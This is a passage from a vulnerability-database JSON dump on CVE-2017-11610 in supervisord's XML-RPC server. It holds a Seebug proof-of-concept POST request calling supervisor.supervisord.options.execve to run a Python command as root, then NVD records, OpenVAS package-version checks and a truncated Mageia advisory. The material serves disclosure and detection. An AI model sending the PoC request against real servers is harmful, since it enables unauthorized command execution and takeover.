system.listMethods):\r\n```\r\n<value><string>supervisor.getPID</string></value>\r\n<value><string>supervisor.getProcessInfo</string></value>\r\n<value><string>supervisor.getState</string></value>\r\n<value><string>supervisor.getSupervisorVersion</string></value>\r\n<value><string>supervisor.getVersion</string></value>\r\n<value><string>supervisor.readLog</string></value>\r\n<value><string>supervisor.readMainLog</string></value>\r\n<value><string>supervisor.readProcessLog</string></value>\r\n<value><string>supervisor.readProcessStderrLog</string></value>\r\n<value><string>supervisor.readProcessStdoutLog</string></value>\r\n<value><string>supervisor.reloadConfig</string></value>\r\n<value><string>supervisor.removeProcessGroup</string></value>\r\n<value><string>supervisor.restart</string></value>\r\n<value><string>supervisor.sendProcessStdin</string></value>\r\n<value><string>supervisor.sendRemoteCommEvent</string></value>\r\n<value><string>supervisor.shutdown</string></value> \r\n```\r\n\r\nIt is possible to access the malicious functions by appending supervisord.options to the namespace. In particular, the execve function in https://github.com/Supervisor/supervisor/blob/3.3.2/supervisor/options.py#L1438 which simply calls Pythons own os.execve() function.\r\n\r\n### Proof of Concept\r\nThe following POST request triggers the vulnerability in supervisor.supervisord.options.execve function which allows an attacker to execute arbitrary commands as root.\r\n\r\nThe below payload utilises python on the target system to touch a file at /tmp/blahh:\r\n```\r\nPOST http://192.168.0.15:9001/RPC2 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/xml\r\nContent-Type: text/xml\r\nAccept-Language: en-GB,en;q=0.5\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nContent-Length: 503\r\nHost: 192.168.0.15:9001\r\n\r\n<?xml version=\"1.0\"?>\r\n<methodCall>\r\n<methodName>supervisor.supervisord.options.execve</methodName>\r\n<params>\r\n<param>\r\n<string>/usr/bin/python</string>\r\n</param>\r\n<param>\r\n<array>\r\n<data>\r\n<value><string>python</string></value>\r\n<value><string>-c</string></value>\r\n<value><string>import os; os.system(\"touch /tmp/blahh\")</string></value>\r\n</data>\r\n</array>\r\n</param>\r\n<param>\r\n<struct>\r\n</struct>\r\n</param>\r\n</params>\r\n</methodCall>\r\n```", "cvss3": {}, "published": "2017-07-27T00:00:00", "type": "seebug", "title": "Supervisor Authenticated Remote Code Execution(CVE-2017-11610)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96316", "id": "SSV:96316", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-09-28T08:45:44", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T14:29:00", "type": "cve", "title": "CVE-2017-11610", "cwe": ["CWE-276"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:supervisord:supervisor:3.1.0", "cpe:/a:supervisord:supervisor:3.2.2", "cpe:/a:supervisord:supervisor:3.1.1", "cpe:/a:supervisord:supervisor:3.3.2", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:supervisord:supervisor:3.1.2", "cpe:/a:supervisord:supervisor:3.2.3", "cpe:/o:fedoraproject:fedora:25", "cpe:/a:supervisord:supervisor:3.3.0", "cpe:/a:supervisord:supervisor:3.3.1", "cpe:/o:fedoraproject:fedora:26", "cpe:/a:supervisord:supervisor:3.2.0", "cpe:/o:fedoraproject:fedora:24", "cpe:/a:supervisord:supervisor:3.2.1", "cpe:/a:supervisord:supervisor:3.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:redhat:cloudforms:4.5", "cpe:/a:supervisord:supervisor:3.1.3"], "id": "CVE-2017-11610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:supervisord:supervisor:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:24:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:25:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:26:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:25:33", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T15:15:00", "type": "cve", "title": "CVE-2020-14882", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:14.1.1.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0"], "id": "CVE-2020-14882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14882", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:34:32", "description": "Calum Hutton reported that the XML-RPC server in supervisor, a system\nfor controlling process state, does not perform validation on requested\nXML-RPC methods, allowing an authenticated client to send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands on\nthe server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup\nentirely. supervisord will now only call methods on the object\nregistered to handle XML-RPC requests and not any child objects it may\ncontain, possibly breaking existing setups. No publicly available\nplugins are currently known that use nested namespaces. Plugins that use\na single namespace will continue to work as before.", "cvss3": {}, "published": "2017-08-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3942-1 (supervisor - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703942", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703942", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3942.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3942-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703942\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-11610\");\n script_name(\"Debian Security Advisory DSA 3942-1 (supervisor - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-13 00:00:00 +0200 (Sun, 13 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3942.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"supervisor on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 3.0r1-1+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.3.1-1+deb9u1.\n\nWe recommend that you upgrade your supervisor packages.\");\n script_tag(name:\"summary\", value:\"Calum Hutton reported that the XML-RPC server in supervisor, a system\nfor controlling process state, does not perform validation on requested\nXML-RPC methods, allowing an authenticated client to send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands on\nthe server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup\nentirely. supervisord will now only call methods on the object\nregistered to handle XML-RPC requests and not any child objects it may\ncontain, possibly breaking existing setups. No publicly available\nplugins are currently known that use nested namespaces. Plugins that use\na single namespace will continue to work as before.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"supervisor\", ver:\"3.3.1-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"supervisor-doc\", ver:\"3.3.1-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"supervisor\", ver:\"3.0r1-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:11:47", "description": "vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as supervisord.", "cvss3": {}, "published": "2018-02-08T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for supervisor (DLA-1047-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891047", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891047", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891047\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-11610\");\n script_name(\"Debian LTS: Security Advisory for supervisor (DLA-1047-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-08 00:00:00 +0100 (Thu, 08 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00042.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"supervisor on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\");\n\n script_tag(name:\"summary\", value:\"vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as supervisord.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"supervisor\", ver:\"3.0a8-1.1+deb7u2\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "Fedora Update for supervisor FEDORA-2017-307eab89e1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_307eab89e1_supervisor_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for supervisor FEDORA-2017-307eab89e1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873229\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:37:21 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-11610\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for supervisor FEDORA-2017-307eab89e1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'supervisor'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"supervisor on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-307eab89e1\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4GMSCGMM477N64Z3BM34RWYBGSLK466B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"supervisor\", rpm:\"supervisor~3.3.3~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "Fedora Update for supervisor FEDORA-2017-713430fb15", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873232", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_713430fb15_supervisor_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for supervisor FEDORA-2017-713430fb15\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873232\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:37:28 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-11610\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for supervisor FEDORA-2017-713430fb15\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'supervisor'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"supervisor on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-713430fb15\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"supervisor\", rpm:\"supervisor~3.1.4~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "Fedora Update for supervisor FEDORA-2017-85eb9f7a36", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_85eb9f7a36_supervisor_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for supervisor FEDORA-2017-85eb9f7a36\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873233\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:37:30 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-11610\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for supervisor FEDORA-2017-85eb9f7a36\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'supervisor'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"supervisor on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-85eb9f7a36\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"supervisor\", rpm:\"supervisor~3.2.4~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-09-28T09:09:52", "description": "A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root (CVE-2017-11610). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-13T13:17:41", "type": "mageia", "title": "Updated supervisor packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-13T13:17:41", "id": "MGASA-2017-0263", 